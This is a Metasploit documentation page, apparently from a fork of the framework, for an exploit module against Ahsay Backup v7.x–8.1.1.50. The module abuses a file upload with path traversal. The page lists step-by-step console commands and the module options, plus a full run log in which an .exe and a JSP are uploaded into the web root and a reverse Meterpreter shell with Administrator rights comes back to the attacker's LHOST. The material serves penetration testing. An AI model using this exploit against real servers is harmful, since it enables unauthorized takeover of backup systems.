adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9b9d3013a40698890d473360ac94de945e76200d
metasploit-gs/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md
T
Wietsman c28bff8435 #12095 Added documentation
2019-07-17 12:55:18 +02:00

2.3 KiB
Raw Blame History

Vulnerable Application

Ahsay Backup v7.x - v8.1.1.50 Download the vulnerable version: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe Start the application ( I start it manually from C:\Program Files\AhsayCBS\bin\startup.bat)

Verification Steps

  1. Start msfconsole
  2. use exploit/windows/misc/ahsay_fileupload
  3. enable create trial account set CREATEACCOUNT true
  4. set RHOST set RHOST 172.16.238.175
  5. set LHOST set LHOST 172.16.238.235
  6. run exploit run
  7. We should receive a meterpreter shell.

Options

CREATEACCOUNT - Create a Trial account, use this when trial accounts is enabled and you do not have a valid credentials. PASSWORD - Password to Ahsay useraccount, if CREATEACCOUNT is set this password will be used. RHOST - Target address. RPORT - The target port (TCP). TARGETURI - Path to Ahsay installation UPLOADPATH - Path to where the file should be uploaded USERNAME - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.

Scenarios

Version of software and OS as applicable

This exploit has been tested on Windows 2003 SP2.

msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
CREATEACCOUNT => true
msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
RHOST => 172.16.238.175
msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
LHOST => 172.16.238.235
msf exploit(windows/misc/ahsay_fileupload) > run

[*] Started reverse TCP handler on 172.16.238.235:4444 
[+] Username and password are valid!
[+] No need to create account, already exists!
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
[+] Exploit executed!
[*] Sending stage (179779 bytes) to 172.16.238.175
[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target

meterpreter > getuid
Server username: AHSAY-123\Administrator
Reference in New Issue View Git Blame Copy Permalink